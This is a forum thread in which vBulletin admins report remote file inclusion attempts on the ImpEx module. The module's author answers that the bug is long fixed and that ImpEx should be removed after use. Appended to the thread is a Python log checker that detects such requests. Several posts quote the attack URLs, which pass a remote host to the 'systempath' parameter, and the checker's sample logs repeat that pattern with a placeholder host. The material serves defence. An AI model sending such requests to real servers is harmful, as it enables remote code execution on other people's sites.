Impex Module Attack

  • Impex Module Attack

    I had the following issue occur yesterday on my forum. From what it appears, someone tried to exploit the Impexdata module to include a file from a remote host.

    The IP has been banned, but the path below was posted and a few png files from user were uploaded. These files were scanned and found to be infected.

    See below:

    /forums/index.php/impex/ImpExData.php?systempath=http://www.example.com/images/saves.php.

    Is this a hole that exists in the module, do I need to be concerned and what can I do to prevent this from happening in the future?

    Thx
    Jerry
    Senior Member
    Last edited by Jerry; Fri 2 Jan '09, 3:29pm. Reason: URL taken out

  • #2
    This bug is very old, and fixed several years ago.

    ImpEx should always be removed from a system once the import is done and the latest version used for every consecutive import.
    I wrote ImpEx.

    Blog | Me

    Comment


    • #3
      Ok, thanks, from what I read it was an old bug, but just wanted to verify.

      thx

      Comment


      • #4
        Originally posted by gphillips
        Ok, thanks, from what I read it was an old bug, but just wanted to verify.

        thx
        Always best
        I wrote ImpEx.

        Blog | Me

        Comment


        • #5
          We just had some also, with a slight variation. Ours look like this:

          Code:
          ..../ForumVB/index.php/impex/ImpExModule.php?systempath=http://www.henneferkanuteam.de/apboard/info.txt????

          Comment


          • #6
            Still, that bug is 4 years old now.

            Comment


            • #7
              Another good reminder to do an import, clean it up, finalise it and then remove ImpEx, as with the speed of updates there will likely be an updated version before you want to do another system import or merge.
              I wrote ImpEx.

              Blog | Me

              Comment
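
Added example, not part of any post in this thread: a small log check that flags requests like the ones quoted above, where a script under `/impex/` receives a remote URL as a query parameter value. It assumes Apache combined log format and goes slightly beyond the thread by flagging any parameter, not only `systempath`; the function name, hosts and log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Client IP and request target from a combined-log-format line (assumed format).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

def find_remote_include_attempts(lines):
    """Return (ip, path, param, value) for each request to an ImpEx script
    whose query string carries a remote URL as a parameter value."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if "/impex/" not in unquote(parts.path).lower():
            continue
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if value.strip().lower().startswith(REMOTE_SCHEMES):
                hits.append((m.group("ip"), parts.path, name, value))
    return hits

# Constructed sample lines (documentation IPs, placeholder host).
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Jan/2009:10:15:02 +0000] "GET /forums/index.php/impex/'
    'ImpExData.php?systempath=http://attacker.example/saves.php HTTP/1.1" 200 512',
    '203.0.113.9 - - [02/Jan/2009:10:16:40 +0000] "GET /ForumVB/index.php/impex/'
    'ImpExModule.php?systempath=http%3A%2F%2Fattacker.example%2Finfo.txt HTTP/1.1" 404 210',
    '198.51.100.4 - - [02/Jan/2009:10:17:11 +0000] '
    '"GET /forums/showthread.php?t=42 HTTP/1.1" 200 9000',
    '198.51.100.4 - - [02/Jan/2009:10:18:30 +0000] "GET /forums/impex/index.php'
    '?systempath=/var/www/forums/impex HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, path, param, value in find_remote_include_attempts(SAMPLE_LOG):
        print(f"{ip} requested {path} with {param}={value}")
```

A hit with a 200 status on a host where the ImpEx directory is still present deserves a closer look than a 404; once ImpEx has been removed as advised above, these requests should only ever return 404.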
